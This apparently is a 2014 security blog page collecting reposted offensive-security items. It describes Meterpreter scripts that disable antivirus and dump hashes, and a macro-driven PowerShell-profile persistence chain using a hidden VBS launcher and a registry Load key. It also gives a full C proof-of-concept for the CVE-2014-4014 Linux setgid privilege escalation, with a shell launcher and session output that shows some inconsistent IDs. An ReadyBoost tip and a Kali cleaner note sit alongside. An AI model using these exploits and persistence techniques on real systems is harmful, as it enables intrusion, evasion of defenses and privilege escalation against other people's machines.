The 'hostsedit' Meterpreter script is for adding entries to the Windows hosts file. Since Windows will check the hosts file first instead of the configured DNS server, it will assist in diverting traffic to a fake entry or entries. Either a single entry can be provided or a series of entries can be provided with a file containing one entry per line.

killav

The 'killav' script can be used to disable most antivirus programs running as a service on a target.

remotewinenum

The 'remotewinenum' script will enumerate system information through wmic on the victim. Make note of where the logs are stored.

scraper

The 'scraper' script can grab even more system information, including the entire registry.

winenum

The 'winenum' script makes for a very detailed windows enumeration tool. It dumps tokens, hashes and much more. 

Source: http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts



Jun 22, 2014

Howto: Use Old USB Drive as RAM in Windows

Step 1: Insert your 4GB or 8GB pendrive.

Step 2: Now go to My Computer and right-click on your pendrive to select Properties.
Step 3: Click on the ReadyBoost tab and wait a couple of seconds while it analyzes your USB drive. You will then see something like the picture below.
Use Pendrive as RAM in Windows
Step 4: Click on "Use this device", select the number of MBs you want to use out of the total space, then click Apply.

Step 5: Next you will see ReadyBoost configuring your cache. When it is done, just reboot your PC to feel the difference. (ReadyBoost uses the flash drive as a disk cache, not as extra RAM, so the gain is largest on machines with little memory and a slow hard disk.)




Howto: Abusing Powershell Profiles

You can create any automatic customization you need and save it in profile.ps1 in the $PsHome directory (C:\Windows\System32\WindowsPowershell\v1.0\). If that file exists, its contents are executed whenever powershell.exe is started. This is Microsoft's way of making the Powershell console easy to customize.

This can also be used for malicious purposes. For example, an attacker can create or overwrite profile.ps1 with malicious code and force powershell.exe to execute in the background.
The macro for this can be found on my Github here:
https://github.com/enigma0x3/PowershellProfile

The workflow goes like this:
1. The document is opened and the macro is executed.
2. Upon execution, the macro creates a file called "cookie.txt" in C:\Users\Default\AppData\Roaming\Microsoft\Cookies\.
3. Once created, it writes a wrapper that executes powershell.exe silently, changes the extension from .txt to .vbs and then sets the file attributes to "hidden". It is just a vbs wrapper that executes Powershell and hides everything from the user. With cookie.vbs (containing a silent powershell launcher) created, it creates a new profile.ps1 in C:\Windows\System32\WindowsPowershell\v1.0\.
4. My example just uses Powershell to execute calc.exe, but you can put any malicious Powershell script in there. Another thing to note is that it sets the attributes of profile.ps1 to hidden as well.
5. As many of you know, the code in profile.ps1 will execute when Powershell is launched. At this point, we have malicious code in profile.ps1 and a vbscript that executes Powershell silently. The last part of this attack is the persistence portion. The malicious macro then creates a registry key in HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load and points it to cookie.vbs in the Default profile.
6. When the user logs in, the registry key executes cookie.vbs, which executes Powershell.exe silently. Because we have calc.exe (or malicious code) in profile.ps1, it is executed as well... silently of course.
 

Source: http://enigma0x3.wordpress.com/2014/06/16/abusing-powershell-profiles/


Tools: kali-cleaner - Little cleaner script for Kali linux

Little cleaner script for Kali Linux. It cleans the apt cache, removes old config files, removes old kernels and empties all trash folders.
Save the script on your Desktop, make it executable and run it to clean Kali Linux.

Source: https://github.com/MasterButcher/kali-cleaner



News: CVE-2014-4014: Linux Kernel Local Privilege Escalation "exploitation" by Vitaly Nikolenko

The CLONE_NEWUSER namespace was introduced in Linux 2.6.23 and completed in Linux 3.8 (and starting from 3.8, unprivileged processes can create user namespaces). It is used to isolate the user and group ID number spaces, i.e., a process's user and group IDs can be different inside and outside a user namespace. For example, a normal (unprivileged) process can create a namespace in which it has a uid of 0.
Hence, a mapping from the user and group IDs inside a user namespace to a corresponding set of user and group IDs outside the namespace is required. This mapping allows the OS to perform the appropriate permission checks when a process in a user namespace performs operations that affect the system outside that namespace, e.g., file system access. However, a number of Linux filesystems are not yet "fully" user-namespace aware.
The bug is in incorrect use of the inode_capable() that determines capabilities of the user or group. Let's take a look at the inode_change_ok() function that uses inode_capable() to check that the caller has sufficient privileges to perform chown, chgrp and chmod operations:

        /* Make sure a caller can chmod. */
        if (ia_valid & ATTR_MODE) {
                if (!inode_owner_or_capable(inode))                          (1)
                        return -EPERM;
                /* Also check the setgid bit! */
                if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :
                                inode->i_gid) &&
                    !inode_capable(inode, CAP_FSETID))                       (2)
                        attr->ia_mode &= ~S_ISGID;
        }
At (2), inode_capable() is called with CAP_FSETID. inode_capable() is then supposed to check whether the caller is allowed to perform the chmod operation based on the mapping of the uid and gid outside the namespace:
bool inode_capable(const struct inode *inode, int cap)
{
        struct user_namespace *ns = current_user_ns();

        return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);    (3)
}
However, as can be seen at (3), the check is only performed for inode->i_uid (and not for inode->i_gid). What that means is that if we own a file as a non-privileged user (outside the namespace) with gid set to 0 (how can that happen?), we can set the setgid bit on that file due to the missing inode->i_gid check above. But yes, we do need to own the file (i.e., it must have our uid) in the first place because of the inode_owner_or_capable() check at (1):
bool inode_owner_or_capable(const struct inode *inode)
{
        if (uid_eq(current_fsuid(), inode->i_uid))
                return true;
        if (inode_capable(inode, CAP_FOWNER))
                return true;
        return false;
}
The following PoC demonstrates the exploitation technique.

PoC

For this example, I'll be using Ubuntu 14.04:
vnik$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 
First, let's assume there is a file owned by us (vnik) with gid of 0:
vnik$ id
uid=1001(vnik) gid=1001(vnik) groups=1001(vnik)

vnik$ ls -al test 
-rw-rw-r-- 1 vnik root 0 Jun 19 13:59 test
So, the gid is root and there are no setuid or setgid bits set. Let's create a user namespace where our user is mapped to root.
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sys/stat.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;

    // close our copy of the write end; read() below returns 0 (EOF) only once
    // the parent has closed its copy too, i.e. after it has written uid_map
    close(f_args->pipe_fd[1]);

    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    // set the setgid bit (by now we are uid 0 inside the namespace)
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);          // (5)

    return 0;
}

int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);

    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);     // (3)
    assert(pid != -1);

    // map uid 0 inside the namespace to our uid outside it
    snprintf(mapping, sizeof(mapping), "0 %d 1\n", (int) getuid());

    // update the uid map in the child (the gid map is left untouched)
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);

    assert(write(fd, mapping, strlen(mapping)) == (ssize_t) strlen(mapping));           // (4)
    close(fd);
    close(f_args.pipe_fd[1]);            // unblocks the child's read()

    assert(waitpid(pid, NULL, 0) != -1);
    return 0;
}
The above code creates a user namespace (3) with a mapping (4) for the current user (outside the namespace) to uid 0 (inside the namespace). The child process within the new namespace then sets the setgid bit (5) on the supplied file. Since there is no check for kgid_has_mapping(ns, inode->i_gid) in inode_capable(), we can set the setgid bit on a file with an arbitrary gid value (even if we don't belong to that group outside the namespace). The above PoC can be downloaded from here.
vnik$ gcc poc.c -o poc
Let's now create a simple shell launcher that we'll use to overwrite the test file:
vnik$ cat << EOF > shell.c
#include <unistd.h>

int main(void) {
    setgid(0);                       /* make the setgid-granted egid the real gid too */
    execl("/bin/bash", "-sh", (char *)0);
    return 1;
}
EOF

vnik$ gcc shell.c -o shell
vnik$ cp shell test && ls -al ./test
-rw-r--r-- 1 vnik root  8564 Jun 20 13:20 test 
Now that we've replaced the test file with our shell (preserving the gid), let's set the setgid bit:
vnik$ ./poc ./test
vnik$ ls -al ./test
-rwxr-s--- 1 vnik root  8564 Jun 20 13:20 test
vnik$ ./test
-sh-4.3$ id  
uid=1000(vnik) gid=1000(vnik) egid=0(root) groups=1000(vnik)
We have egid = 0. Whoopty doo! Yes, we can now read and write files (that were previously only readable or writable by gid = 0) but that does not directly lead to root.


Source: http://hashcrack.org/index.html#190614

